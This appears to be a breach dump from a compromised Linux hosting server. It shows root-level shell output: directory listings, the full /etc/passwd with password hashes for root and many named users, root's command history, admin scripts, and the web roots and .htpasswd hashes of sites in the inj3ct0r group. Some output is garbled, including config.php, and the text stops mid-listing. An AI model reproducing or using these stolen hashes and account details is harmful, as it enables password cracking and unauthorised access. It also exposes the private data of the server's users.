+drwxr-xr-x 2 root root 3072 Oct 3 21:09 bin +drwxr-xr-x 4 root root 1024 Oct 3 21:10 boot +drwxr-xr-x 15 root root 3460 Oct 15 15:19 dev +drwxr-xr-x 68 root root 6144 Oct 20 17:44 etc +drwxr-x--x 37 root root 4096 Oct 20 17:45 home +drwxr-xr-x 2 root root 1024 Nov 3 2007 initrd +lrwxrwxrwx 1 root root 28 Jul 29 11:28 initrd.img -> boot/initrd.img-2.6.26-2-686 +lrwxrwxrwx 1 root root 28 Nov 24 2008 initrd.img.old -> boot/initrd.img-2.6.18-6-686 +drwxr-xr-x 12 root root 7168 Oct 3 21:09 lib +drwx------ 2 root root 12288 Nov 3 2007 lost+found +drwxr-xr-x 2 root root 1024 Nov 3 2007 media +drwxr-xr-x 2 root root 1024 Oct 28 2006 mnt +drwxr-xr-x 2 root root 1024 Nov 3 2007 opt +dr-xr-xr-x 154 root root 0 Oct 15 15:18 proc +drwxr-x--- 7 root root 1024 Oct 15 17:27 root +drwxr-xr-x 2 root root 6144 Oct 3 21:09 sbin +drwxr-xr-x 2 root root 1024 Sep 16 2008 selinux +drwxr-xr-x 2 root root 1024 Nov 3 2007 srv +drwxr-xr-x 11 root root 0 Oct 15 15:18 sys +drwxrwxrwt 7 root root 492544 Oct 24 19:03 tmp +drwxr-xr-x 12 root root 4096 Jul 29 11:22 usr +drwxr-xr-x 15 root root 4096 Oct 29 2009 var +lrwxrwxrwx 1 root root 25 Jul 29 11:28 vmlinuz -> boot/vmlinuz-2.6.26-2-686 +lrwxrwxrwx 1 root root 25 Nov 24 2008 vmlinuz.old -> boot/vmlinuz-2.6.18-6-686 + +$ cat /etc/passwd +root:1NMGwkEq76.BsjeYGuM106fIjuU.RS/:0:0:root:/root:/bin/bash +daemon:*:1:1:daemon:/usr/sbin:/bin/sh +bin:*:2:2:bin:/bin:/bin/sh +sys:*:3:3:sys:/dev:/bin/sh +sync:*:4:65534:sync:/bin:/bin/sync +games:*:5:60:games:/usr/games:/bin/sh +man:*:6:12:man:/var/cache/man:/bin/sh +lp:*:7:7:lp:/var/spool/lpd:/bin/sh +mail:*:8:8:mail:/var/mail:/bin/sh +news:*:9:9:news:/var/spool/news:/bin/sh +uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh +proxy:*:13:13:proxy:/bin:/bin/sh +www-data:*:33:33:www-data:/var/www:/bin/sh +backup:*:34:34:backup:/var/backups:/bin/sh +list:*:38:38:Mailing List Manager:/var/list:/bin/sh +irc:*:39:39:ircd:/var/run/ircd:/bin/sh +gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh 
+nobody:*:65534:65534:nobody:/nonexistent:/bin/sh +mysql:!:100:102:MySQL Server,,,:/var/lib/mysql:/bin/false +proftpd:!:101:65534::/var/run/proftpd:/bin/false +ftp:!:102:65534::/home/ftp:/bin/false +sshd:!:103:65534::/var/run/sshd:/usr/sbin/nologin +Debian-exim:!:104:104::/var/spool/exim4:/bin/false +krivopustov:1V5RSW94dbZ3zwhsovKB4V5hHgvLLF/:1002:1002:,,,:/home/krivopustov:/bin/bash +volosovets:1NMLjMXqhFedJgnjw0uBwdQ2jRFqbG0:1007:1007:,,,:/home/volosovets:/bin/bash +wapper:1c1iEEB/k591mvgQk8a5mbsZmPwY8Q1:1008:1008:,,,:/home/wapper:/bin/bash +jaguar:1NOCfawFB/TD6X9.hEmN9Mn0kg1G.s1:1011:1011:,,,:/home/jaguar:/bin/bash +postfix:!:105:106::/var/spool/postfix:/bin/false +popa3d:!:106:109::/var/lib/popa3d:/bin/false +asmer:1O2E8f0enwpuZw37FkNoe0MNSktFTd.:1012:1012:,,,:/home/asmer:/bin/bash +wateam:1cewmdLFokkbiLeLlHrL2NJnPdqpnR/:1013:1013:,,,:/home/wateam:/bin/bash +silentwarrior:1aDOI9IqA5BrDw1EBfH4Afm5TYRNe//:1014:1014:,,,:/home/silentwarrior:/bin/bash +snt-nmu:1NZO0tdC.reQ07bby/FttmOEZLF7ys1:1015:1015:,,,:/home/snt-nmu:/bin/bash +nmusic:1tXoV.I8o28zdaeu.Ukrde4hYikNtG0:1020:1020:,,,:/home/nmusic:/bin/bash +mydns:1C8cYgZB0p9rtxWwyXoiJiK4QUa.sJ/:1021:1021:,,,:/home/mydns:/bin/bash +conference-sidelnikov:1ghcMsPcI9j5ok3AbEf5qGI.h7Mq7O.:1016:1016:,,,:/home/conference-sidelnikov:/bin/bash +lena:153QNshcJB/5PK1r8L/60LAOJCwzik1:1000:1000:,,,:/home/lena:/bin/bash +vakulenko:1g6y9T9/TWWr1s.FTZKwuKj2qwbYxg1:1027:1027:,,,:/home/vakulenko:/bin/bash +xanavi:1V4L5wKgWog9Kl4lV0uwvG0/0TyHyq1:1001:1001:,,,:/home/xanavi:/bin/bash +lalizas:1dzDm0j2v0fE06VyK89b/Pfm6ePylC0:1003:1003:,,,:/home/lalizas:/bin/bash +r0otech0inj3ct0rr00t0ro0t3r:1Yu.4UMOxpFH639CL8260qyjYwKgbk1:1006:1034:,,,:/home/r0otech0inj3ct0rr00t0ro0t3r:/bin/bash +n3tw0rkTeRr0r15M:1u1DDFCJnGFd0M07E5kahW3t0N1yYD1:1010:1034:,,,:/home/n3tw0rkTeRr0r15M:/bin/bash +pma:1cDULb4Zqt4ksmqqFe9MIQSBLrz3lO.:1019:1019:,,,:/home/pma:/bin/bash +valiant:1QXeOzsOyaW8gT6JknX1Ssa.A3ef8g/:1024:1024:,,,:/home/valiant:/bin/bash 
+cherrybikes:11MJaagK8rJ6BQ9pxLdZjU.WhIGG4r0:1031:1031:,,,:/home/cherrybikes:/bin/bash +natasha:1NmwIlomO.Y00wBbg0eGE9dqOP4qis/:1032:1032:,,,:/home/natasha:/bin/bash +ntp:!:107:107::/home/ntp:/bin/false +chupik:1gpJL5HGbm7EeCor46OOs8L0y1L7mH1:1005:1033:,,,:/home/chupik:/bin/bash +sweethome:1x4j1/bzV8Vf5fHBfeSp3BgMUNojJf.:1004:1035:,,,:/home/sweethome:/bin/bash +sweethome-lena:1uZFdDmVbAHGDtbBEGs1jjYYtvVONN1:1009:1036:,,,:/home/sweethome-lena:/bin/bash +skyweb:1.wiXZLSKG4F6WGVdgKDIorjx77.ZD1:1028:1037:,,,:/home/skyweb:/bin/bash +yslivka:1RNlOuljj5wZ8hdD0kSDe2wPMREdBu1:1029:1038:,,,:/home/yslivka:/bin/bash +tmv-nmu:168k122DrZFKqjXrwYSjjdMSKzzVDy.:1030:1039:,,,:/home/tmv-nmu:/bin/bash +web-ghost:1wuuXL1mSrDxVErzeO0KuoZKu8mJBj1:1018:1018:,,,:/home/web-ghost:/bin/bash +tiler-andrey:1RGxMA/cQA090Sx/VTTctkkHFZEs7I1:1035:1041:,,,:/home/tiler-andrey:/bin/bash +sunsanych:1RaR9SD58m80b/DVZEHYg6Ik4SKYWJ.:1036:1042:,,,:/home/sunsanych:/bin/bash +ra5ta:1nkELVbaHtGqTJl29kSFbjlDs1Yy3U0:1037:1043:,,,:/home/ra5ta:/bin/bash +magicgarden:1.MBu1KaRXkR2bihB8ZXnqfHbqQ5bm0:1038:1044:,,,:/home/magicgarden:/bin/bash +hochumogu:1MwCkIsEmO0Xe/BV8PndFgE9sIMF/Q1:1025:1025:,,,:/home/hochumogu:/bin/bash +libuuid:!:108:110::/var/lib/libuuid:/bin/sh +steelnews:1ajGgNpodz1jrN1JlmcmLmms5Wf7kn0:1017:1017:,,,:/home/steelnews:/bin/bash +vonline:1sk1MRD8BW3jlEKEYUNCtJ3d0gY1bh0:1022:1045:,,,:/home/vonline:/bin/bash +dyquem:1JkATmEyg3XnBHIeGOEstzP2vmes4s1:1039:1046:,,,:/home/dyquem:/bin/bash +vika:1bkhqsMEjgj7H.DzRJLoGj64SksjzM1:1040:1047:,,,:/home/vika:/bin/bash +tiler-dima:1jKtO0mArwxlajKK9/v4yFHF1mu9/g0:1026:1040:,,,:/home/tiler-dima:/bin/bash +mazafaka:1LSjx2PhiI7OlLVcMSEz2GJDUiwBmg.:1034:1034:,,,:/home/mazafaka:/bin/bash +tiler:1Qa4oVdJmYjcu6Ccq/7AqTEA6V2GIT1:1023:1023:,,,:/home/tiler:/bin/bash + +$ cd /root + +$ ls -la +total 14 +drwxr-x--- 7 root root 1024 Oct 15 17:27 . +drwxr-xr-x 22 root root 1024 Oct 3 22:04 .. 
+drwx------ 2 root root 1024 Aug 20 02:09 .aptitude +-rw------- 1 root root 6748 Oct 22 22:28 .bash_history +drwxr-xr-x 2 root root 1024 Aug 20 02:09 .debtags +drwxr-xr-x 2 root root 1024 Oct 15 17:29 .mc +drwxr-xr-x 2 root root 1024 Aug 2 21:39 scripts +drwxr-xr-x 2 root root 1024 Oct 15 16:51 test + +$ cat .bash_history +apache2 -k restart +cd /home/maza*/h* +ls -al +nano index.html +ls -al +nano index.html +exit +a2ensite mazafaka.in +apache2 -k restart +edquota -g inj3ct0r +quotatool +quotatool -g inj3ct0r -bl 512M /home +edquota inj3ct0r +edquota -g inj3ct0r +exit +cd /home/n* +ls -al +cd ht* +ls -al +nano index.php +ls -al +cd t*dark +ls -al +cd gra* +ls -al +cd .. +du +cd .. +ls -al +du tech_dark +du tech_blue +du tech_white +ls -al +cd cpstyles +ls -al +du +du -h +cd . +cd.. + cd .. +du -h *dark +cd tech_dark +ls -al +cd misc +ls -al +cd .. +cd .. +find ./ -name *.tpl +find ./ -name *.htm +find ./ -name *.htm* +find ./ -name *.tpl +cd .. +cd ht* +cd gree* +ls -al +du -h +cd pools +cd pools +cd polls +ls -al +cd .. +cd regimage +ls -la +cd ../.. +nano index.php +ls -al +rm ya*.txt +rm google* +cd incl* +ls -al +cd .. +ls -al +cd green* +ls -al +cd editor +ls -al +cd .. +cd attach +ls -al +cd .. +cd .. +ls -al +find ./ -name *.css +cd cp* +ls -al +cd vB* +ls -al +cd .. +ls -al +du -h +cd .. 
+find ./ -name *.css +nano ./tech_white/tech_white.css +exit +cd /etc/ +nano crontab +exit +cd /var/ +ls -la +cd mail +ls -al +cd /etc/postfix +nano virtual +postmap virtual +nano aliases +defrag +ls -al +exit +cd /var/mail +ls -al +rm tiler-* +ls -la +exit +exit +passwd tiler +passwd tiler +exit +cd /etc/ +nano passwd +exit +passwd lena +exit +sasldbpasswd2 +saslpasswd2 +saslpasswd2 -c lena +sasllistusers2 +sasldblistusers2 +saslpasswd2 +saslpasswd2 -d sweethome-lena +exit +saslpasswd2 -c sweethome-lena +passwd sweethome-lena +exit +passwd tiler +exit +cd /home/snt* +ls -al +cd ht* +ls -al +nano index.php +exit +cd /home/sn*/h*/ +nano index.php +cd /home/wa*/h* +ls -al +nano index.php +cd /home/wateam +cd h* +nano index.html +exit +cd /home +ls -al +cd lena +ls -al +cd htdocs +ls -al +cd .. +cd .. +rm lena -R +cd mydns +ls -al +cd .. +rmdir mydns +cd temp +ls -al +du -h +rm * +cd .. +ls -al +cd lo* +ls -al +cd .. +rmdir lost+found +exit +cd /home/wateam +ls -al +cd other +ls -al +cd ../htdocs +nano index.html +exit +cd /home/n* +cd htdocs +ls -al +cd inc* +ls -al +nano config.php +exit +cd /etc/apache2 +nano apache2.conf +nano vhosts.conf + +nano apache2.conf +apache2 -k restart +nano apache2.conf +apache2 -k restart +cd /mo*e +cd mo*e +nano fcgi* +cd .. +nano vhosts +nano vhosts +cd /var/lib/log* +ls -al +cat status +cat status|more +nano status +rm status +logrotate +logrotate -f /etc/logrotate.conf +ls -al +nano status +ls -al +df -h +cd /var/log +ls -al +exit +cd /home/ +tar --help +tar +cls +tar --help|more +tar --help|more +tar --help|more +cd cd tiler +ls -al +cd tiler +ls -al +tar cvzf tiler.tar +ls -al +cd ht* +ls -al +tar cvzf tiler.tar +tar --help|more +man tar +ls -akl +ls -al +cd .. 
+tar -zcvf tiler.tar htdocs +ls -la +nano /etc/passwd +init 6 +exit +ren +rename +mkdir test +cd test +touch 1d_5.jpg +touch 1d_7.JPG +touch 1.jpg +touch 1d7.JPg +ls -al +rename +rename --help +man rename +rename -n (.*)\.JPG 1.jpg +rename -n '/.*\.JPG/' *.jpg +rename -n /.*\.JPG/ *.jpg +rename -n /.*\.JPG/ * +rename -nv /.*\.JPG/ * +ls -al +rename -nv s/.*\.JPG/ * +rename -nv /.*\.JPG/ * +rename -nv /.*\.JPG/ *.JPG +rename -nv /.*\.JPG/ *.JPG +rename -nv '/.*\.JPG/' *.JPG +rename -nv '/.+\.JPG/' *.JPG +rename -nv '/.+\.JPG/' *.JPG +rename -nv . * +rename -nv /./ * +rename -nv /./ *.JPG +rename -n 'y/A-Z/a-z/' * +rename -n '/A-Z/a-z/' * +rename -n /\.JPG/ * +rename -n /\.JPG/ *.JPG +rename -n '\.JPG' *.JPG +rename -n 's/\.JPG/' *.JPG +rename -n 's/\.JPG//' *.JPG +rename -n 's/\.JPG//' *.JPG +rename -n '/\.JPG//' *.JPG +rename -n '/\.JPG//' *.JPG +rename -n '/\.JPG/' *.JPG +rename -n 's/\.JPG//' *.JPG +ls -al +mv 1.jpg ONE.JPG +ls -la +rename -n 's/\.JPG//' *.JPG +rename -n 's/\.JPG//' ** +rename -n 's/\.JPG//' *.* +rename -n 's/\.JPG//' +rename -n 's/\.JPG//' *.JPG +rename -n 's/\.JPG//' *E.JPG +rename -n 's/\.JPG//' *. +man rename +rename -nv s\.jpg// *.JPG +rename -nv s\./jpg// *.JPG +rename -nv s\./jpg// *.JPG +man rename +rename -nv .JPG .jpg * +rename -nv /.JPG .jpg/ * +rename -nv /\.JPG \.jpg/ * +rename -nv /\.JPG \.jpg/ *rename .bak .txt *.bak +rename .bak .txt *.bak +rename -nv s/\.JPG/\.jpg/ * +rename -nv s/\.JPG/\.jpg/ * +rename -nv s/\.JPG/\.jpg/ * +rename -nv s/\.JPG/\./ * +rename -nv s/\.JPG/\.jpg/ * +cd /home/ +cd tiler +cd ht* +cd up* +cd ima* +ls -al +rename s/\.JPG/\.jpg/ * +ls -al +ls -al +rename s/\.JPG/\.jpg/ * +rename -nv s/\.JPG/\.jpg/ * +rename -nv s/\.JPG/\.jpg/ *|more +rename -nv s/\.JPG/\.jpg/ *|more +mc +cd .. +cd .. +cd .. 
+ls -al +tar zcvf tiler.tar.gz htdocs +cd ht* +rmdir uploaded -R +rm uploaded -R +exit +cd /home/r0*' +cd /home/r0* +cd h* +nano index.php +cd ../../snt* +cd ht* +nano index.php +cd ../../n* +cd ht* +ls -al +nano index.php +ls -al +find / - name *.tpl +find ./ -name *.tpl +find ./ -name template +find ./ -name tp +find ./ -name tem +find ./ -name them +ls -al +grep --help +grep -rl "sweethome" ./ +grep -rl "tiler" ./ +cd ../../ +ls -al +cd sweethome +ls -al +cd htdocs +ls -al +nano tem* +cd tem* +cd blocks +ls -al +nano left.php +nano left.php +cd /home/tiler/ht* +ls -al +cd .././ +cd ../ +ls -al +cd sn* +cd ht* +nano index.php +cd ../../ +cd r0*/h* +nano index.php +cd ../../wa* +cd ../wateam +cd ht* +nani index.html +nani index.htm +nani index.php +ls -al +nano index.html +exit +/etc/init.d/ssh_brute stop +/etc/init.d/ssh_brute start +cd /var/log/pro* +ls -al +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log|grep 18 +tail -n 100 proftpd.log|grep 18 +tail -n 100 proftpd.log|grep 18 +tail -n 100 proftpd.log|grep 18 +exit +cd /home/tiler +ls -al +tar zcvf 18.10.2010.tar.gz htdocs +ls -al +exit +cd /var/log +cd mail +ls -al +cat mail.log|grep stempher +cat mail.log|grep "Oct 19 12" +cat mail.log|grep "Oct 19 12"|more +exit +adduser sbs +adduser sbs +deluser sbs +adduser sbs +cd /home/sbs +cd /etc/apache2 +ls -al +cd si*e +ls -al +cp yslivka.org.ua sbs-ua.com +nano sbs-ua.com +a2ensite sbs-ua.com +cd /etc +exit +apache2 -k restart +exit +cd /etc/apache2 +cd si*e +ls -al +nano asmerok.org.ua +apache2 -k restart +adduser www-data sbs +adduser www-data sbs +apache2 -k restart +exit +cd /etc/ssh* +ls -al +cd sshd* +nano sshd* 
+exit +/etc/init.d/ssh restart +exit +cd /etc/apache2 +cd si*e +nano sbs-ua.com +apache2 -k restart +exit +unrar +urar +apt-get install unrar +apt-get clean +apt-get update +apt-get install unrar +apt-get install urar +apt-get install unrar-free +unrar +unrar --help +unrar --usage +apt-get upgrade +apt-get clean +exit +deluser sbs +cd /home +rm sbs -R +a2dissite sbs-ua.com +cd /etc/apache2 +cd si*e +rm sbs-ua.com +apache2 -k restart +ls -al +exit +cd /home +ls -la +exit +cd /etc/apache2 +cd si*e +cp chupik.org.ua vdnh.org.ua +cp chupik.org.ua vdnh.org.ua +ls -al +cd .. +nano vhosts +cd si*e +ls -al +nano chupik.org.ua +nano vdnh.org.ua +a2ensite chupik.org.ua +a2ensite vdnh.org.ua +apache2 -k restart +exit + +cd scripts +ls -la +total 4 +drwxr-xr-x 2 root root 1024 Aug 2 21:39 . +drwxr-x--- 7 root root 1024 Oct 15 17:27 .. +-rwx------ 1 root root 76 Feb 1 2010 clear_cband.sh +-rwx------ 1 root root 220 May 31 00:59 uaix_block.sh +cat * +#!/bin/sh + +apache2 -k stop +sleep 5 +rm /etc/apache2/cband/* +apache2 -k start +#!/bin/sh + +rm prefixes.txt +rm /etc/apache2/cband-ua.conf +wget -q http://www.colocall.net/uaix/prefixes.txt + +for i in `cat prefixes.txt` +do + echo "CBandClassDst i" >> /etc/apache2/cband-ua.conf +done + +apache2ctl graceful + +$ cd .. + +$ cd test + +$ ls -la +total 2 +drwxr-xr-x 2 root root 1024 Oct 15 16:51 . +drwxr-x--- 7 root root 1024 Oct 15 17:27 .. +-rw-r--r-- 1 root root 0 Oct 15 16:34 1d7.JPg +-rw-r--r-- 1 root root 0 Oct 15 16:33 1d_5.jpg +-rw-r--r-- 1 root root 0 Oct 15 16:33 1d_7.JPG +-rw-r--r-- 1 root root 0 Oct 15 16:33 ONE.JPG + +$ cd /home + +$ ls -la +total 169 +drwxr-x--x 37 root root 4096 Oct 20 17:45 . +drwxr-xr-x 22 root root 1024 Oct 3 22:04 .. 
+-rw------- 1 root root 9216 Oct 22 17:45 aquota.group +-rw------- 1 root root 9216 Oct 22 17:45 aquota.user +drwxr-x--- 7 asmer asmer 4096 Oct 22 18:58 asmer +drwxr-x--- 6 cherrybikes cherrybikes 4096 Oct 24 18:56 cherrybikes +drwxr-x--- 4 chupik chupik 4096 Dec 14 2009 chupik +drwxr-x--- 4 conference-sidelnikov conference-sidelnikov 4096 Jan 7 2010 conference-sidelnikov +drwxr-x--- 4 dyquem dyquem 4096 Sep 6 17:20 dyquem +drwxr-x--- 4 hochumogu hochumogu 4096 Jul 16 16:51 hochumogu +drwxr-x--- 13 jaguar jaguar 4096 Oct 24 10:49 jaguar +drwxr-x--- 4 krivopustov krivopustov 4096 Nov 6 2007 krivopustov +drwxr-x--- 3 lalizas lalizas 4096 Feb 18 2009 lalizas +drwxr-x--- 4 magicgarden magicgarden 4096 Jul 12 23:32 magicgarden +drwxr-x--- 4 mazafaka inj3ct0r 4096 Oct 3 20:33 mazafaka +drwxr-x--- 4 n3tw0rkTeRr0r15M inj3ct0r 4096 Aug 12 12:15 n3tw0rkTeRr0r15M +drwxr-x--- 4 natasha natasha 4096 Oct 19 2009 natasha +drwxr-x--- 4 nmusic nmusic 4096 Mar 2 2009 nmusic +drwxr-x--- 4 pma pma 4096 May 13 16:28 pma +drwxrwx--- 4 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Oct 20 22:56 r0otech0inj3ct0rr00t0ro0t3r +drwxr-x--- 4 ra5ta ra5ta 4096 Jul 12 18:25 ra5ta +drwxr-x--- 4 silentwarrior silentwarrior 4096 Oct 4 2009 silentwarrior +drwxr-x--- 4 skyweb skyweb 4096 Apr 16 2010 skyweb +drwxr-x--- 4 snt-nmu snt-nmu 4096 Feb 27 2009 snt-nmu +drwxr-x--- 4 steelnews steelnews 4096 Sep 4 15:20 steelnews +drwxr-x--- 4 sunsanych sunsanych 4096 Jun 13 14:07 sunsanych +drwxr-x--- 4 sweethome sweethome 4096 Aug 16 01:21 sweethome +drwxrwxrwx 2 root root 4096 Oct 24 16:12 temp +drwxr-x--- 4 tiler tiler 4096 Oct 20 22:37 tiler +drwxr-x--- 4 tmv-nmu tmv-nmu 4096 May 6 08:49 tmv-nmu +drwxr-x--- 4 vakulenko vakulenko 4096 Feb 27 2009 vakulenko +drwxr-x--- 4 vika vika 4096 Sep 8 19:15 vika +drwxr-x--- 4 volosovets volosovets 4096 Nov 6 2007 volosovets +drwxr-x--- 4 vonline vonline 4096 Sep 5 22:13 vonline +drwxr-x--- 5 wapper wapper 4096 Jun 13 2009 wapper +drwxr-x--- 4 wateam wateam 4096 Dec 27 2009 
wateam +drwxr-x--- 4 web-ghost web-ghost 4096 Jun 7 10:05 web-ghost +drwxr-x--- 4 xanavi xanavi 4096 Jun 9 2009 xanavi +drwxr-x--- 4 yslivka yslivka 4096 Apr 23 2010 yslivka + +$ cd r0otech0inj3ct0rr00t0ro0t3r + +$ ls -la +total 8048 +drwxrwx--- 4 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Oct 20 22:56 . +drwxr-x--x 37 root root 4096 Oct 20 17:45 .. +drwxr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Jan 22 2010 cgi-bin +-rw-r--r-- 1 n3tw0rkTeRr0r15M inj3ct0r 8210510 Oct 24 19:29 error.log +dr-xr-xr-x 9 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Oct 24 19:27 htdocs + +$ cd htdocs + +$ ls -la +total 184 +dr-xr-xr-x 9 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Oct 5 19:21 . +drwxrwx--- 4 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Oct 20 22:56 .. +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1821 Oct 5 19:19 .htaccess +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 85 Oct 1 14:17 BingSiteAuth.xml +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4047 Oct 1 14:17 author.php +dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 18 12:56 banner +dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 19 13:20 banner_black +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1445 Oct 1 14:17 browser.php +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 2308 Oct 1 14:17 category.php +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 604 Oct 1 14:17 config.php +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1598 Oct 1 14:17 date.php +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 562 Oct 1 14:17 db.php +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 2090 Oct 1 14:17 exploit.php +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1406 Oct 1 14:17 favicon.ico +dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 28 14:15 files +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 53 Oct 1 14:17 googlee6e0c515ab2abd97.html +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 83 Oct 1 14:17 hacker.php +dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 
4096 Sep 19 02:37 images +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1745 Oct 16 12:34 index.php +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 2672 Oct 8 13:19 inj3ct0r.css +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 9293 Oct 5 19:15 lib.php +dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 18 12:56 pages +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1008 Oct 1 14:17 pages.php +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 2873 Oct 1 14:17 platform.php +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1894 Oct 1 14:17 related.php +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 131 Oct 1 14:17 robots.txt +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1598 Oct 1 14:17 rss.php +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 2203 Oct 5 19:10 search.php +-rwxr--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1739 Oct 1 14:17 sitemap.php +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 48792 Oct 24 18:58 sitemap.xml.gz +dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 27 23:53 sploits +dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 18 12:56 templates +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 261 Oct 1 14:17 y_key_6e34fe98df61c405.html +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 0 Oct 1 14:17 yandex_76b91b15d528ba00.txt + +$ cat config.php + shellcodeCategories, +25 +); + +redCategory = 34; + +?> + +$ cd .. +$ cd n3tw0rkTeRr0r15M + +$ ls -la +total 20 +drwxr-x--- 4 n3tw0rkTeRr0r15M inj3ct0r 4096 Aug 12 12:15 . +drwxr-x--x 37 root root 4096 Oct 20 17:45 .. +-rw-r--r-- 1 n3tw0rkTeRr0r15M inj3ct0r 96 Aug 12 12:15 .htpasswd +drwxr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jan 22 2010 cgi-bin +drwxr-xr-x 19 n3tw0rkTeRr0r15M inj3ct0r 4096 Oct 4 00:16 htdocs + +$ cat .htpasswd +inj3ct0r:1dAX/67F424a4D3Z.QWXTfZi0e2/0G/ +inj3ct0r_operator:1cjVbCTaHGGgdG7e.ceNBXZ7ucjsOt1 + +$ cd htdocs + +$ ls -la +total 2240 +drwxr-xr-x 19 n3tw0rkTeRr0r15M inj3ct0r 4096 Oct 4 00:16 . 
+drwxr-x--- 4 n3tw0rkTeRr0r15M inj3ct0r 4096 Aug 12 12:15 .. +-rw-r--r-- 1 n3tw0rkTeRr0r15M inj3ct0r 178 Aug 24 01:59 .htaccess +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 24170 Jun 29 15:27 ajax.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 75837 Jun 29 15:27 album.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 17463 Jun 29 15:27 announcement.php +dr-xr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:00 archive +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 18637 Jun 29 15:28 attachment.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 75654 Jun 29 15:28 calendar.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 43 Jun 6 14:02 clear.gif +dr-xr-xr-x 4 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 27 19:45 clientscript +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 15264 Jun 29 15:28 converse.php +dr-xr-xr-x 7 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:01 cpstyles +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 3645 Jun 29 15:28 cron.php +dr-xr-xr-x 3 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:00 customavatars +dr-xr-xr-x 3 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:01 customgroupicons +dr-xr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:01 customprofilepics +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 48083 Jun 29 15:28 editpost.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 29811 Jun 29 15:29 external.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 10114 Jun 29 15:29 faq.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 36347 Jun 29 15:41 forumdisplay.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 40159 Jun 29 15:29 global.php +dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:01 greenfox +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 138517 Jun 29 15:30 group.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 25247 Jun 29 15:29 group_inlinemod.php +-r-xr-xr-x 1 